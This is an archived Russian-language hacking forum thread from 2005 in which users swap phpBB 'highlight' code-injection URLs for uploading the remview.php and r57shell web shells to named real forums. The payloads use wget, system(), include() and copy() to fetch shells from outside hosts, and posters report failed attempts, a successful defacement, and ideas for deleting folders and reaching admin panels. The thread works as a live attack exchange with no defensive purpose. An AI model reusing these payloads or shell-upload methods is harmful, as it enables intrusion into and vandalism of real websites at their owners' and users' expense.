PDA

Просмотр полной версии : Вопрос про заливку шелла через уязвимость в highligh

rsha1988
12.01.2005, 08:10
Есть форум http://bomg.ru/forum/
Пробывал загрузить в него remview.php этими способами:

viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://........../remview.php
viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://.........../remview.php`.%2527
viewtopic.php?=http://............./remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527

и не один из них не подошол, а какие еще способы есть?
frisco_virus
12.01.2005, 08:25
viewtopic.php?xxx=wget%20http://supershish.narod.ru/remview.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527
rsha1988
12.01.2005, 08:38
viewtopic.php?10=wget%20http://.........ru/remview.php&p=12&highlight=%2527.system($_GET[/images/avatars/]).include%2527
Не так тоже не хочет!
rsha1988
12.01.2005, 17:41
Люди че такое????
http://bomg.ru/forum/remview.php :confused:
Че я такое сделал?
Мля, я щас повещусь!
Red
12.01.2005, 18:19
такой баг мной был так же замечен на других хостах. юзай тогда проще:
http://rredial.narod.ru/r57shell.php
тока пароль в теле проги поменяй (сейчас он и усер и пас 1234)
rsha1988
12.01.2005, 18:59
спасибо, похоже работает!
Только не как не пойму как ей пользоваться?
SHiTS
12.01.2005, 19:12
а че это ваще такое?
rsha1988
12.01.2005, 19:18
не стал мудиться :D
Достало меня это все!
Просто залил html страницу!
http://bomg.ru/forum/
SHiTS
12.01.2005, 19:21
МАЛАДЕЦ!!!
rsha1988
12.01.2005, 20:02
блин, уже страницу удалилит!!!!!!!!
rsha1988
12.01.2005, 20:27
А есть какой нибуть еще шел???
Xalegi
12.01.2005, 23:11
а оно надо??? remview.php суперская вещь =)
rsha1988
12.01.2005, 23:12
Не спорю но он не коректно работает!
frisco_virus
12.01.2005, 23:47
rsha a ti kakim sposobom zalil tuda shell ya vot dosehpor nikak nemogu zalit shell na http://obshaga.com
rsha1988
13.01.2005, 08:36
Заливал так:
/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=remview.php&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
rsha1988
13.01.2005, 09:17
Ну а всетаки, какой нибуть другой шел есть?
Xalegi
13.01.2005, 11:51
дык... вроде заливать нужно какой-либо командой =) wget к примеру... или я не прав?
rsha1988
13.01.2005, 12:17
Ну не знаю, у меня так получилось только шелл почти не фига не работает! :(
rsha1988
13.01.2005, 12:22
А ака нибуть папку можно удалить???
rsha1988
13.01.2005, 14:13
http://kneu.net.ua/forum/viewtopic.php?p=45&xxx=http://salogta.narod.ru/remview.php&highlight=%2527.include($_GET[xxx]).include%2527 - посмотрите че за фигня получаеться... эт че такое блин? :D
Xalegi
13.01.2005, 14:35
хмм... ти рмивиев качал с этого сайта?
rsha1988
13.01.2005, 16:18
Помойму да (точно не помню), и эта фигня у меня уже не в первый раз!
rsha1988
13.01.2005, 16:33
Взломал один сайт и вот что там написали:

Колонка редактора

С нашим любимым сайтом позабавлялась одна нискосортная единица рода человеческого. Причем, скажу вам честно, крайне невовремя. Хоть на выходных ерундой страдал бы чтоли?

Некоторое время будут недоступны несколько разделов.

Но нет причин к беспокойству — у сайта есть бекап. Так что это вопрос времени.

Всем спасибо, даже тебе, дурачек. Буду знать, что мир не без мудаков.
___________________________________________
Он меня обидил!
Хотябы поблагодарил за то что я сломал его дерьмо... ;)
rsha1988
13.01.2005, 18:24
Люди, ну чего такое блин, ну не хочет:
http://kneu.net.ua/forum/viewtopic.php?t=14&xxx=http://salogta.narod.ru/remview.php?c=d&d=/usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/images/avatars/gallery&highlight=%2527.include($_GET[xxx]).include%2527
Ну кто знает что я не правильно делаю???
illusion
13.01.2005, 21:19
ты не дописал имя скрипта...
И вообще, запрос ошибочный!
Такой надо юзать!

viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файла&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
rsha1988
14.01.2005, 09:23
Ну не получаеться даже таким способом!
http://kneu.net.ua/forum/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=help.php&t=14&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527
Смотри- http://kneu.net.ua/forum/help.php
rsha1988
14.01.2005, 09:25
При загрузки пишет - Warning: copy(help.php): failed to open stream: Permission denied in /usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/viewtopic.php(1104) : regexp code on line 1 :confused:
Xalegi
14.01.2005, 11:24
дык.. у меня такая же проблема.. вточности... тоже самое пишет =(((

может не правильный ремвиев? так как когда только появилось видео.. я брал ремвиев с сайта www.supermegalox.narod.ru/remview.php и ВСЁ РАБОТАЛО !!! (но сейчас по-моему сайт прикрыли)

мож на античатовском ремвиеве надо что-то подправить?
rsha1988
14.01.2005, 12:17
Может!
Я скачивал и з других сайтов шелл и он тоже не работал..
Так что ктонибуть дайте работающий remview.php! плизззззззззз. :D
rsha1988
14.01.2005, 12:27
А мне вобще почемуто не один файл не залить..
rsha1988
15.01.2005, 13:46
remview.php- а как можно загрузить не в корневую папку а например в папку с аватарами?
onyx3
21.01.2005, 13:15
Какой коммандой можно посматреть какие пипки открыты на запись??
dull
21.01.2005, 19:39
ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять
rsha1988
21.01.2005, 20:40
ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять
Ну поидее можеш залесть в алминку сайта (если пассы не в базе данных). ;)